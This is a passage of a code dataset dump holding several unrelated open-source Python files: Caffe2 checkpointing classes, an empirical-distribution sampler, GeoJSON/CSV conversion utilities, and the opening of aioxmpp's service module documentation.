Task(outputs=[self._blob_names]) as task:\n if retrieve_from_epoch is None:\n ops.GetAllBlobNames(\n [],\n self._blob_names,\n include_shared=False)\n else:\n ops.Load(\n [], self._blob_names,\n db=self._db_name(retrieve_from_epoch),\n db_type=self._db_type,\n absolute_path=True)\n self._names_output = task.outputs()[0]\n return task\n\n def blob_list(self):\n assert self._names_output\n return self._names_output.fetch().tolist()\n\n def _db_name(self, epoch):\n return '%s.%06d' % (self._db, epoch)\n\n def load(self, epoch):\n \"\"\"\n Build a Task that will be run by JobRunner when the job is to be\n resumed from a given epoch. This task will run a Load op that will\n load and deserialize all relevant blobs from a persistent storage.\n \"\"\"\n logger.info('Load from %s' % self._db_name(epoch))\n with Task() as task:\n ops.Load(\n [],\n self.blob_list(),\n db=self._db_name(epoch),\n db_type=self._db_type,\n absolute_path=True)\n return task\n\n def load_blobs_from_checkpoint(self, blob_names, epoch):\n \"\"\"\n Builds a Task that loads only the necessary blobs from a checkpoint of\n the given epoch. The necessary blobs are given in the blob_names\n argument.\n\n Args:\n blob_names: A list of strings. Each string is the name of a\n blob.\n epoch: The checkpoint epoch to load from.\n\n Returns:\n A Task which loads the specified blobs from the checkpoint of the\n given epoch.\n \"\"\"\n logger.info('Load from %s' % self._db_name(epoch))\n with Task() as task:\n ops.Load(\n [],\n blob_names,\n db=self._db_name(epoch),\n db_type=self._db_type,\n absolute_path=True,\n allow_incomplete=True)\n return task\n\n def check_db_exists(self, epoch):\n logger.info('Check existence of %s' % self._db_name(epoch))\n with Task() as task:\n existence = ops.Const(False)\n ops.DBExists(\n [],\n [existence],\n db_name=self._db_name(epoch),\n db_type=self._db_type,\n absolute_path=True)\n task.add_output(existence)\n return task\n\n def save(self, epoch):\n \"\"\"\n Build a Task that is run once after `init_group` and after each\n epoch is run. This will execute a Save ops to serialize and persist\n blobs present in the global workspaace.\n \"\"\"\n logger.info('Save to %s' % self._db_name(epoch))\n with Task() as task:\n ops.Save(\n self.blob_list(), [], db=self._db_name(epoch),\n db_type=self._db_type, absolute_path=True)\n return task\n\n\nclass MultiNodeCheckpointManager(object):\n \"\"\"\n Coordinates checkpointing and checkpointing across multiple nodes.\n Each of `init`, `load` and `save` will build TaskGroups which will\n trigger checkpointing on each of the nodes involved in a distributed job.\n \"\"\"\n def __init__(\n self, db_prefix, db_type, node_manager_class=CheckpointManager):\n self._node_manager_class = node_manager_class\n self._node_managers = None\n self._db_prefix = db_prefix\n self._db_type = db_type\n\n def _task_group(self, func, *args, **kw):\n assert self._node_managers is not None, 'init must be called first.'\n with TaskGroup(WorkspaceType.GLOBAL) as task_group:\n for node, manager in self._node_managers:\n with Node(node):\n func(manager, *args, **kw)\n return task_group\n\n def init(self, nodes, retrieve_from_epoch=None):\n if self._node_managers is not None:\n assert [node for node, _ in self._node_managers] == nodes\n return\n self._node_managers = []\n for node in nodes:\n with Node(node):\n manager = self._node_manager_class(\n db=os.path.join(self._db_prefix, node),\n db_type=self._db_type)\n self._node_managers.append((node, manager))\n return self._task_group(\n self._node_manager_class.init,\n nodes=[node],\n retrieve_from_epoch=retrieve_from_epoch)\n\n def load(self, epoch):\n return self._task_group(self._node_manager_class.load, epoch)\n\n def load_blobs_locally(self, nodes, blob_names, epoch, session):\n \"\"\"Loads the necessary blobs from the checkpoints to the current node.\n\n Args:\n blob_names: A list of strings. Each string is the name of a\n blob.\n epoch: An integer. The checkpoint epoch to load from.\n session: A Session object to execute the Load ops.\n \"\"\"\n if self._node_managers is not None:\n assert [node for node, _ in self._node_managers] == nodes\n else:\n self._node_managers = []\n for node in nodes:\n with Node(node):\n manager = self._node_manager_class(\n db=os.path.join(self._db_prefix, node),\n db_type=self._db_type)\n self._node_managers.append((node, manager))\n assert self._node_managers is not None, 'must initialize node managers'\n for _, manager in self._node_managers:\n existence_task = manager.check_db_exists(epoch)\n session.run(existence_task)\n existence = existence_task.outputs()[0].fetch()\n if not existence:\n logger.info('DB %s does not exist!' % manager._db_name(epoch))\n return False\n load_task = manager.load_blobs_from_checkpoint(blob_names, epoch)\n session.run(load_task)\n logger.info('Successfully loaded from checkpoints.')\n return True\n\n def save(self, epoch):\n return self._task_group(self._node_manager_class.save, epoch)\n\n\nclass JobRunner(object):\n \"\"\"\n Implement the runtime logic for jobs with checkpointing at the level of\n epoch. Can be used to run either single-host or distributed jobs. Job\n runner is a callable to be called once from the client, passing a Session\n as argument. This call will block until the Job execution is complete.\n\n If a checkpoint_manager is passed, checkpoints will be taken after\n initialization and after each epoch execution. If, in addition,\n `resume_from_epoch` is an epoch number, the corresponding checkpoint will\n be loaded and job execution will continue from the given epoch. In\n this case, the job's init_group will not be run.\n\n Refer to checkpoint_test.py for an example.\n \"\"\"\n def __init__(self, job, checkpoint_manager=None, resume_from_epoch=None):\n self.resume_from_epoch = resume_from_epoch\n self.checkpoint = checkpoint_manager\n self.job = job\n\n def __call__(self, client):\n from_scratch = self.resume_from_epoch is None\n if from_scratch:\n client.run(self.job.init_group)\n\n if self.checkpoint:\n logger.info('Preparing checkpoint ...')\n client.run(self.checkpoint.init(\n self.job.nodes_to_checkpoint(),\n retrieve_from_epoch=self.resume_from_epoch))\n if from_scratch:\n logger.info('Saving first checkpoint ...')\n client.run(self.checkpoint.save(0))\n logger.info('First checkpoint saved.')\n else:\n logger.info('Loading checkpoint for epoch {} ...'.format(\n self.resume_from_epoch))\n client.run(self.checkpoint.load(self.resume_from_epoch))\n logger.info('Checkpoint loaded.')\n\n epoch = 1 if from_scratch else self.resume_from_epoch + 1\n while True:\n logger.info('Starting epoch %d.' % epoch)\n client.run(self.job.epoch_group)\n logger.info('Ran epoch %d.' % epoch)\n stop_signals = [o.fetch() for o in self.job.stop_signals]\n\n if self.checkpoint:\n logger.info('Saving checkpoint ...')\n client.run(self.checkpoint.save(epoch))\n logger.info('Checkpoint saved.')\n\n if any(stop_signals):\n logger.info('Stopping.')\n break\n epoch += 1\n client.run(self.job.exit_group)\n return epoch\n\n def load_blobs_from_checkpoints(self, blob_names, epoch, session):\n \"\"\"Loads the necessary blobs from the checkpoints.\n\n Checkpoints store the snapshots of the workspace in each node.\n Sometimes we only need to load a subset of the blobs from the\n checkpoints. One common scenario is to load only the model blobs from\n the checkpoints for evaluation purpose. Given the names of the necessary\n blobs, this function goes over all the checkpoints of all the nodes, but\n only loads the blobs specified in the blob_names to the current\n workspace.\n\n Args:\n blob_names: A list of strings. Each string is the name of a\n blob.\n epoch: An integer. The checkpoint epoch to load from.\n session: A Session object to execute the load ops.\n\n Raises:\n ValueError: When the checkpoint manager is invalid.\n \"\"\"\n if not self.checkpoint:\n raise ValueError('Checkpoint manager is None')\n logger.info('Loading checkpoint for epoch {} ...'.format(epoch))\n return self.checkpoint.load_blobs_locally(self.job.nodes_to_checkpoint(),\n blob_names, epoch, session)\n\n\ndef epoch_limiter(num_epochs):\n \"\"\"\n Creates a task that will output True when a given\n number of epochs has finished.\n \"\"\"\n with Job.current().init_group:\n init_net = core.Net('epoch_counter_init')\n counter = init_net.CreateCounter([], init_count=num_epochs - 1)\n Task(step=init_net)\n epoch_net = core.Net('epoch_countdown')\n finished = epoch_net.CountDown(counter)\n output = Task(step=epoch_net, outputs=finished).outputs()[0]\n Job.current().add_stop_signal(output)\n","repo_name":"lumtis/react-native-caffe2","sub_path":"caffe2/caffe2/python/checkpoint.py","file_name":"checkpoint.py","file_ext":"py","file_size_in_byte":15471,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"21"} +{"seq_id":"5091223433","text":"\"\"\" draw from an empirical distribution, uses the inverse\n transformation method and linear interpolation\"\"\"\n\nimport numpy as np\nimport random\n#import scipy\nimport pylab\n\n\ndef draw_empirical(data, r):\n \"\"\"one draw (for given r ~ U(0,1)) from the\n empirical cdf based on data\"\"\"\n\n d = {x: data.count(x) for x in data}\n obs_values, freq = zip(*sorted(zip(d.keys(), d.values())))\n obs_values = list(obs_values)\n freq = list(freq)\n empf = [x*1.0/len(data) for x in freq]\n ecum = np.cumsum(empf).tolist()\n ecum.insert(0, 0)\n obs_values.insert(0, 0)\n\n for x in ecum:\n if r <= x:\n rpt = x\n break\n r_end = ecum.index(rpt)\n y = obs_values[r_end] - 1.0*(ecum[r_end]-r)*(obs_values[r_end] -\n obs_values[r_end-1])/(ecum[r_end]-ecum[r_end-1])\n return y\n\n\n# Experiment ---------\nif __name__ == \"__main__\":\n\n data = [1, 2, 2, 2, 6, 2, 5, 9, 4, 4]\n r = random.random()\n\n print(r)\n print(draw_empirical(data, r))\n\n##ys = scipy.rand(10000)\n##xs = [draw_empirical(data, a) for a in ys]\n# pylab.scatter(xs,ys)\n# pylab.show()\n","repo_name":"kevinye-git/DATA304project","sub_path":"Code/draw_emp.py","file_name":"draw_emp.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"21618629244","text":"import csv\nimport json\nfrom pathlib import Path\nfrom typing import Dict\nfrom typing import Generator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport geojson\nimport geopandas as gpd\nimport pandas as pd\nimport shapely.geometry\n\nfrom geoschema.google_s2 import points_to_s2_cell_token\nfrom geoschema.proj_utils import LONLAT4326_PYPROJ_CRS\nfrom geoschema.proj_utils import valid_lonlat\nfrom geoschema.uuid_utils import get_uuids\n\nfrom geoschema.logger import get_logger\n\nLOGGER = get_logger()\n\n\ndef geojson_from_gdf(gdf: gpd.GeoDataFrame) -> Dict:\n feature_collection = geojson.loads(gdf.to_json())\n assert len(feature_collection[\"features\"]) == len(gdf)\n return feature_collection\n\n\ndef df_with_uuid(df: pd.DataFrame):\n LOGGER.info(\"Adding UUIDs to DataFrame\")\n uuids = get_uuids(len(df))\n df[\"uuid\"] = pd.Series(uuids, dtype=\"string\")\n\n\ndef gdf_with_uuid(gdf: gpd.GeoDataFrame):\n \"\"\"\n Add a 'uuid' column\n :param gdf: a geopandas.GeoDataFrame\n \"\"\"\n LOGGER.info(\"Adding UUIDs to GeoDataFrame\")\n uuids = get_uuids(len(gdf))\n gdf[\"uuid\"] = pd.Series(uuids, dtype=\"string\")\n\n\ndef gdf_with_google_s2(gdf: gpd.GeoDataFrame):\n \"\"\"\n Add a 's2_cell_id' column for a Google s2 cell ID from the geometry,\n assuming that the geometry is in WGS84 (lon, lat) points\n :param gdf: a geopandas.GeoDataFrame\n \"\"\"\n LOGGER.info(\"Adding google S2 CellId to GeoDataFrame\")\n s2_cells = points_to_s2_cell_token(points=gdf.geometry)\n gdf[\"s2_cell_id\"] = pd.Series(s2_cells, dtype=\"string\")\n\n\ndef gdf_validate_lonlat_points(gdf: gpd.GeoDataFrame, wrap: bool = False) -> bool:\n \"\"\"\n Validate that a GeoDataFrame has a CRS in EPSG:4326 and that\n all the geometry shapes are points with (lon,lat) values\n\n :param gdf: a geopandas.GeoDataFrame\n :param wrap: wrap any longitude value within [-180, 180)\n \"\"\"\n if not LONLAT4326_PYPROJ_CRS.is_exact_same(gdf.crs):\n LOGGER.error(\"CRS (%s) is not exact same as WGS84 EPSG:4326\", gdf.crs)\n return False\n for p in gdf.geometry:\n assert isinstance(p, shapely.geometry.Point)\n if valid_lonlat(p.x, p.y, wrap) is None:\n LOGGER.error(\"POINT (%s) is not in WGS84 bounds\", p)\n return False\n return True\n\n\ndef gdf_from_csv_file(\n csv_file: Union[Path, str],\n lon_field: str = \"longitude\",\n lat_field: str = \"latitude\",\n add_uuid: bool = True,\n add_s2: bool = True,\n) -> gpd.GeoDataFrame:\n \"\"\"\n Read a CSV file that contains WGS84 longitude and latitude\n columns for point geometries\n\n .. seealso::\n - https://geopandas.org/gallery/create_geopandas_from_pandas.html\n\n :param csv_file: a string or Path to a CSV file\n :param lon_field: the name of the longitude column\n :param lat_field: the name of the latitude column\n :param add_s2: add google s2 cell ID to each point\n :param add_uuid: add a UUID to each point\n :return: a geopandas.GeoDataFrame\n \"\"\"\n\n # TODO: support a WKT geometry field too, e.g.\n # from shapely import wkt\n # df['Coordinates'] = df['Coordinates'].apply(wkt.loads)\n\n # TODO: validate lon,lat are in WGS84\n LOGGER.info(\"Reading: %s\", csv_file)\n\n csv_df = pd.read_csv(csv_file)\n assert isinstance(csv_df[lon_field], pd.Series)\n assert isinstance(csv_df[lat_field], pd.Series)\n\n LOGGER.info(\"Composing GeoDataFrame with EPSG:4326\")\n csv_gdf = gpd.GeoDataFrame(\n csv_df,\n geometry=gpd.points_from_xy(csv_df[lon_field], csv_df[lat_field]),\n crs=\"EPSG:4326\",\n )\n\n # Note: don't do a merge of two GeoDataFrames like this, it can result in extra rows\n # uuid_gdf = gpd.GeoDataFrame({\"geometry\": csv_gdf.geometry, \"uuid\": uuids})\n # csv_gdf.merge(uuid_gdf)\n\n if add_uuid:\n gdf_with_uuid(csv_gdf)\n\n if add_s2:\n gdf_with_google_s2(csv_gdf)\n\n return csv_gdf\n\n\ndef geojson_from_csv_file(\n csv_file: Union[Path, str],\n lon_field: str = \"longitude\",\n lat_field: str = \"latitude\",\n) -> Dict:\n \"\"\"\n Read a CSV file that contains WGS84 longitude and latitude\n columns for point geometries\n\n .. seealso::\n - https://geopandas.org/gallery/create_geopandas_from_pandas.html\n\n :param csv_file: a string or Path to a CSV file\n :param lon_field: the name of the longitude column\n :param lat_field: the name of the latitude column\n :return: a geojson feature collection (as dict)\n \"\"\"\n csv_gdf = gdf_from_csv_file(csv_file, lon_field, lat_field)\n return geojson_from_gdf(csv_gdf)\n\n\ndef geojson_limit_features(\n collection: Dict, offset: int = None, limit: int = None\n) -> Tuple[Dict, int]:\n \"\"\"\n Limit GeoJSON features\n\n :param collection: a geojson feature collection\n :param offset: Optional start index for the features to return\n :param limit: Optional upper limit on the number of features to return\n :return: tuple of (geojson, total_features)\n \"\"\"\n total_features = len(collection[\"features\"])\n LOGGER.debug(\"Total collection['features']: %s\", total_features)\n if offset is not None and limit is not None:\n offset = int(offset)\n limit = int(limit)\n LOGGER.debug(\"Limit features with offset: %s, limit: %s\", offset, limit)\n collection[\"features\"] = collection[\"features\"][offset : offset + limit]\n return collection, total_features\n\n\ndef geojson_fields(geojson_feature: Dict, sort: bool = False) -> List[str]:\n \"\"\"\n Extract property fields from a geojson Feature\n\n These fields can be used to convert GeoJSON data to CSV. The fields\n can be sorted as an option; the default order is based on the\n ordered dictionary for the property keys (plus 'wkt').\n\n .. code-block::\n\n geojson_feature = geojson[\"features\"][0]\n fields = geojson_fields(geojson_feature)\n\n Assuming the fields are consistent across all the geojson features, this\n list of fields can be used to extract all the values into lists with a\n consistent order of values. A generic 'wkt' field is added to hold a\n Well Known Text (wtk) representation of feature geometry.\n\n :param geojson_feature: a geojson Feature\n :param sort: sort the fields (defaults to False)\n In recent versions of python, the `properties` dictionary will be\n an ordered dictionary, so the order of the fields in the returned\n list should be consistent and based on the order of the property keys.\n :return: a list of property fields, which are all assumed\n to be the field names of the feature-properties in the geojson;\n it will be constructed from the geojson feature-properties.\n \"\"\"\n csv_fields = list(geojson_feature[\"properties\"].keys())\n if sort:\n csv_fields = sorted(csv_fields)\n return csv_fields + [\"wkt\"]\n\n\ndef geojson_to_csv(geojson_data: Dict, csv_fields: List[str] = None) -> List[List]:\n \"\"\"\n Convert geojson FeatureCollection to CSV lists\n\n This can be used to convert geojson to CSV and save a CSV file, e.g. assuming\n the geojson_data contains features with a Point geometry:\n\n .. code-block::\n\n import csv\n import json\n\n with open(\"input.geojson\", \"r\") as geojson_fd:\n geojson_data = json.load(geojson_fd)\n\n feature = geojson_data[\"features\"][0]\n fields = geojson_fields(feature)\n csv_rows = geojson_to_csv(geojson_data, csv_fields=fields)\n\n with open('csv_file.csv', \"w\") as f:\n csv_writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)\n csv_writer.writerows(csv_rows)\n\n :param geojson_data: a geojson FeatureCollection\n :param csv_fields: an optional list of CSV header fields, which are all assumed\n to be the field names of the feature-properties in the geojson_data;\n if this is not provided, it will be constructed from the properties\n of the first feature in the geojson_data[\"features\"] (with the\n assumption that feature coordinates can be represented as WKT).\n :return: a list of one or more lists with CSV values in each list; the\n first list is the fields of the CSV header\n \"\"\"\n if csv_fields is None:\n feature = geojson_data[\"features\"][0]\n csv_fields = geojson_fields(feature)\n\n csv_rows = [csv_fields]\n for feature in geojson_data[\"features\"]:\n properties = feature[\"properties\"]\n csv_row = []\n for field in csv_fields:\n if field in [\"wkt\", \"WKT\"]:\n wkt = shapely.geometry.shape(feature[\"geometry\"]).wkt\n csv_row.append(wkt)\n else:\n csv_row.append(properties.get(field))\n csv_rows.append(csv_row)\n\n return csv_rows\n\n\ndef geojson_file_to_csv_file(\n geojson_file: str, csv_file: str = None, csv_fields: List[str] = None\n) -> str:\n \"\"\"\n Convert geojson file to csv file\n\n :param geojson_file: a file path string for a .geojson file\n that is assumed to contain a geojson FeatureCollection\n :param csv_file: an optional file path string for a .csv file; if it is\n not provided, the geojson_file is used to output a new .csv file with\n the same file path and file name.\n :param csv_fields: an optional list of CSV header fields, which are all assumed\n to be the field names of the feature-properties in the geojson file;\n if this is not provided, it will be constructed from the geojson\n feature-properties (with the assumption that the coordinates can\n be represented as WKT values).\n :return: CSV file (a file path string)\n \"\"\"\n if csv_file is None:\n csv_file = str(Path(geojson_file).with_suffix(\".csv\"))\n\n LOGGER.debug(\"Converting from geojson: %s\", geojson_file)\n LOGGER.debug(\"Converting to csv: %s\", csv_file)\n\n with open(geojson_file, \"r\") as geojson_fd:\n geojson_data = geojson.load(geojson_fd)\n\n csv_rows = geojson_to_csv(geojson_data, csv_fields)\n\n with open(csv_file, \"w\") as f:\n csv_writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)\n csv_writer.writerows(csv_rows)\n\n return csv_file\n\n\ndef geojsons_dump(geojson_features: List[Dict], geojsons_file: str) -> Optional[str]:\n \"\"\"\n :param geojson_features: a list of geojson features; from any\n feature collection, this is geojson_collection[\"features\"]\n :param geojsons_file: a file path to write\n :return: if the dump succeeds, return the geojsons_file, or None\n \"\"\"\n LOGGER.info(\"Saving GeoJSONSeq to %s\", geojsons_file)\n with open(geojsons_file, \"w\") as dst:\n for feature in geojson_features:\n geojson.dump(feature, dst)\n dst.write(\"\\n\")\n\n geojsons_path = Path(geojsons_file)\n if geojsons_path.is_file() and geojsons_path.stat().st_size > 0:\n return geojsons_file\n\n\ndef geojsons_load(geojsons_file: Union[Path, str]) -> List[Dict]:\n \"\"\"\n Read GeoJSON Text Sequence data from a file\n\n :param geojsons_file: a file path to write\n :return: geojson features\n\n .. seealso::\n\n - https://tools.ietf.org/html/rfc8142\n\n \"\"\"\n file = Path(geojsons_file)\n assert file.exists()\n file_content = file.read_text()\n geojsons = file_content.splitlines()\n # some geojsons lines could be empty\n features = []\n while geojsons:\n feature = geojsons.pop(0).strip()\n if feature:\n features.append(json.loads(feature))\n return features\n\n\ndef geojsons_yield(geojsons_file: Union[Path, str]) -> Generator[Dict, None, None]:\n \"\"\"\n Read GeoJSON Text Sequence data from a file\n and yield each geojson feature for each line\n\n :param geojsons_file: a file path to write\n :return: yield geojson features\n\n .. seealso::\n\n - https://tools.ietf.org/html/rfc8142\n\n \"\"\"\n file = Path(geojsons_file)\n assert file.exists()\n with open(file, \"r\") as fd:\n while True:\n feature_line = fd.readline()\n if not feature_line:\n break\n # some geojsons lines could be empty\n feature = feature_line.strip()\n if feature:\n yield json.loads(feature)\n\n\ndef verify_geojson_output(file: Path) -> bool:\n if not file.suffix == \".geojson\":\n return False\n if file.exists() and file.stat().st_size > 0:\n with open(file, \"r\") as fd:\n geojson.load(fd)\n return True\n return False\n\n\ndef verify_json_output(file: Path) -> bool:\n if not file.suffix == \".json\":\n return False\n if file.exists() and file.stat().st_size > 0:\n with open(file, \"r\") as fd:\n json.load(fd)\n return True\n return False\n","repo_name":"dazza-codes/geoschema","sub_path":"geoschema/geojson_utils.py","file_name":"geojson_utils.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32684272426","text":"########################################################################\n# File name: service.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\n\"\"\"\n:mod:`~aioxmpp.service` --- Utilities for implementing :class:`~.Client` services\n#################################################################################\n\nProtocol extensions or in general support for parts of the XMPP protocol are\nimplemented using :class:`Service` classes, or rather, classes which use the\n:class:`Meta` metaclass.\n\nBoth of these are provided in this module. To reduce the boilerplate required\nto develop services, :ref:`decorators ` are\nprovided which can be used to easily register coroutines and functions as\nstanza handlers, filters and others.\n\n.. autoclass:: Service\n\n.. _api-aioxmpp.service-decorators:\n\nDecorators and Descriptors\n==========================\n\nThese decorators provide special functionality when used on methods of\n:class:`Service` subclasses.\n\n.. note::\n\n These decorators work only on methods declared on :class:`Service`\n subclasses, as their functionality are implemented in cooperation with the\n :class:`Meta` metaclass and :class:`Service` itself.\n\n.. note::\n\n These decorators and the descriptors (see below) are initialised in the\n order in which they are declared at the class. In many cases, this does\n not matter, but there are some corner cases.\n\n For example: Suppose you have a class like this:\n\n .. code-block:: python\n\n class FooService(aioxmpp.service.Service):\n feature = aioxmpp.disco.register_feature(\n \"some:namespace\"\n )\n\n @aioxmpp.service.depsignal(aioxmpp.DiscoServer, \"on_info_changed\")\n def handle_on_info_changed(self):\n pass\n\n In this case, the ``handle_on_info_changed`` method is not invoked during\n startup of the ``FooService``. In this case however:\n\n .. code-block:: python\n\n class FooService(aioxmpp.service.Service):\n @aioxmpp.service.depsignal(aioxmpp.DiscoServer, \"on_info_changed\")\n def handle_on_info_changed(self):\n pass\n\n feature = aioxmpp.disco.register_feature(\n \"some:namespace\"\n )\n\n The ``handle_on_info_changed`` *is* invoked during startup of the\n ``FooService`` because the ``some:namespace`` feature is registered\n *after* the signal is connected.\n\n .. versionchanged:: 0.9\n\n This behaviour was introduced in version 0.9.\n\n When using a descriptor and a :func:`depsignal`\n connected to :meth:`.DiscoServer.on_info_changed`: if the\n :class:`.disco.register_feature` is declared *before* the :func:`depsignal`,\n the signal handler will not be invoked for that specific feature because\n it is registered before the signal handler is connected).\n\n.. autodecorator:: iq_handler\n\n.. autodecorator:: message_handler\n\n.. autodecorator:: presence_handler\n\n.. autodecorator:: inbound_message_filter()\n\n.. autodecorator:: inbound_presence_filter()\n\n.. autodecorator:: outbound_message_filter()\n\n.. autodecorator:: outbound_presence_filter()\n\n.. autodecorator:: depsignal\n\n.. autodecorator:: depfilter\n\n.. autodecorator:: attrsignal\n\n.. seealso::\n\n :class:`~.disco.register_feature`\n For a descriptor (see below) which allows to register a Service Discovery\n feature when the service is instantiated.\n\n :class:`~.disco.mount_as_node`\n For a descriptor (see below) which allows to register a Service Discovery\n node when the service is instantiated.\n\n :class:`~.pep.register_pep_node`\n For a descriptor (see below) which allows to register a PEP node\n including notification features.\n\nTest functions\n--------------\n\n.. autofunction:: is_iq_handler\n\n.. autofunction:: is_message_handler\n\n.. autofunction:: is_presence_handler\n\n.. autofunction:: is_inbound_message_filter\n\n.. autofunction:: is_inbound_presence_filter\n\n.. autofunction:: is_outbound_message_filter\n\n.. autofunction:: is_outbound_presence_filter\n\n.. autofunction:: is_depsignal_handler\n\n.. autofunction:: is_depfilter_handler\n\n.. autofunction:: is_attrsignal_handler\n\nCreating your own decorators\n----------------------------\n\nSometimes, when you create your own service, it makes sense to create own\ndecorators which depending services can use to make easy use of some features\nof your service.\n\n.. note::\n\n Remember that it isn’t necessary to create custom decorators to simply\n connect a method to a signal exposed by another service. Users of that\n service should be using :func:`depsignal` instead.\n\nThe key part is the :class:`HandlerSpec` object. It specifies the effect the\ndecorator has on initialisation and shutdown of the service. To add a\n:class:`HandlerSpec` to a decorated method, use :func:`add_handler_spec` in the\nimplementation of your decorator.\n\n.. autoclass:: HandlerSpec(key, is_unique=True, require_deps=[])\n\n.. autofunction:: add_handler_spec\n\nCreating your own descriptors\n-----------------------------\n\nSometimes a decorator is not the right tool for the job, because with what you\nattempt to achieve, there’s simply no relationship to a method.\n\nIn this case, subclassing :class:`Descriptor` is the way to go. It provides an\nabstract base class implementing a :term:`descriptor`. Using a\n:class:`Descriptor` subclass, you can create objects for each individual\nservice instance using the descriptor, including cleanup.\n\n.. autoclass:: Descriptor\n\nMetaclass\n=========\n\n.. autoclass:: Meta()\n\"\"\" # NOQA: E501\n\nimport abc\nimport asyncio\nimport collections\nimport contextlib\nimport logging\nimport warnings\nimport weakref\n\nimport aioxmpp.callbacks\nimport aioxmpp.stream\n\n\ndef automake_magic_attr(obj):\n obj._aioxmpp_service_handlers = getattr(\n obj, \"_aioxmpp_service_handlers\", {}\n )\n return obj._aioxmpp_service_handlers\n\n\ndef get_magic_attr(obj):\n return obj._aioxmpp_service_handlers\n\n\ndef has_magic_attr(obj):\n return hasattr(\n obj, \"_aioxmpp_service_handlers\"\n )\n\n\nclass Descriptor(metaclass=abc.ABCMeta):\n \"\"\"\n Abstract base class for resource managing descriptors on :class:`Service`\n classes.\n\n While resources such as callback slots can easily be managed with\n decorators (see above), because they are inherently related to the method\n they use, others cannot. A :class:`Descriptor` provides a method to\n initialise a context manager. The context manager is entered when the\n service is initialised and left when the service is shut down, thus\n providing a way for the :class:`Descriptor` to manage the resource\n associated with it.\n\n The result from entering the context manager is accessible by reading the\n attribute the descriptor is bound to.\n\n Subclasses must implement the following:\n\n .. automethod:: init_cm\n\n .. autoattribute:: value_type\n\n Subclasses may override the following to modify the default behaviour:\n\n .. autoattribute:: required_dependencies\n\n .. automethod:: add_to_stack\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._data = weakref.WeakKeyDictionary()\n\n @property\n def required_dependencies(self):\n \"\"\"\n Iterable of services which must be declared as dependencies on a class\n using this descriptor.\n\n The default implementation returns an empty list.\n \"\"\"\n return []\n\n @abc.abstractmethod\n def init_cm(self, instance):\n \"\"\"\n Create and return a :term:`context manager`.\n\n :param instance: The service instance for which the CM is used.\n :return: A context manager managing the resource.\n\n The context manager is responsible for acquiring, initialising,\n destructing and releasing the resource managed by this descriptor.\n\n The returned context manager is not stored anywhere in the descriptor,\n it is the responsibility of the caller to register it appropriately.\n \"\"\"\n\n def add_to_stack(self, instance, stack):\n \"\"\"\n Get the context manager for the service `instance` and push it to the\n context manager `stack`.\n\n :param instance: The service to get the context manager for.\n :type instance: :class:`Service`\n :param stack: The context manager stack to push the CM onto.\n :type stack: :class:`contextlib.ExitStack`\n :return: The object returned by the context manager on enter.\n\n If a context manager has already been created for `instance`, it is\n re-used.\n\n On subsequent calls to :meth:`__get__` for the given `instance`, the\n return value of this method will be returned, that is, the value\n obtained from entering the context.\n \"\"\"\n\n cm = self.init_cm(instance)\n obj = stack.enter_context(cm)\n self._data[instance] = cm, obj\n return obj\n\n def __get__(self, instance, owner):\n if instance is None:\n return self\n try:\n cm, obj = self._data[instance]\n except KeyError:\n raise AttributeError(\n \"resource manager descriptor has not been initialised\"\n )\n return obj\n\n @abc.abstractproperty\n def value_type(self):\n \"\"\"\n The type of the value of the descriptor, once it is being accessed\n as an object attribute.\n\n .. versionadded:: 0.9\n \"\"\"\n\n\nclass Meta(abc.ABCMeta):\n \"\"\"\n The metaclass for services. The :class:`Service` class uses it and in\n general you should just inherit from :class:`Service` and define the\n dependency attributes as needed.\n\n Only use :class:`Meta` explicitly if you know what you are doing,\n and you most likely do not. :class:`Meta` is internal API and may\n change at any point.\n\n Services have dependencies. A :class:`Meta` instance (i.e. a service class)\n can declare dependencies using the following attributes.\n\n .. attribute:: ORDER_BEFORE\n\n An iterable of :class:`Service` classes before which the class which is\n currently being declared needs to be instantiated.\n\n Thus, any service which occurs in :attr:`ORDER_BEFORE` will be\n instantiated *after* this class (if at all). Think of it as \"*this*\n class is ordered *before* the classes in this attribute\".\n\n .. versionadded:: 0.3\n\n .. attribute:: SERVICE_BEFORE\n\n Before 0.3, this was the name of the :attr:`ORDER_BEFORE` attribute. It\n is still supported, but use emits a :data:`DeprecationWarning`. It must\n not be mixed with :attr:`ORDER_BEFORE` or :attr:`ORDER_AFTER` on a class\n declaration, or the declaration will raise :class:`ValueError`.\n\n .. deprecated:: 0.3\n\n Support for this attribute will be removed in 1.0; starting with 1.0,\n using this attribute will raise a :class:`TypeError` on class\n declaration and a :class:`AttributeError` when accessing it on a\n class or instance.\n\n .. attribute:: ORDER_AFTER\n\n An iterable of :class:`Service` classes which will be instantiated\n *before* the class which is being declraed.\n\n Classes which are declared in this attribute are always instantiated\n before this class is instantiated. Think of it as \"*this* class is\n ordered *after* the classes in this attribute\".\n\n .. versionadded:: 0.3\n\n .. attribute:: SERVICE_AFTER\n\n Before 0.3, this was the name of the :attr:`ORDER_AFTER` attribute. It\n is still supported, but use emits a :data:`DeprecationWarning`. It must\n not be mixed with :attr:`ORDER_BEFORE` or :attr:`ORDER_AFTER` on a class\n declaration, or the declaration will raise :class:`ValueError`.\n\n .. deprecated:: 0.3\n\n See :attr:`SERVICE_BEFORE` for details on the deprecation cycle.\n\n Further, the following attributes are generated:\n\n .. attribute:: PATCHED_ORDER_AFTER\n\n An iterable of :class:`Service` classes. This includes all\n classes in :attr:`ORDER_AFTER` and all classes which specify the class\n in 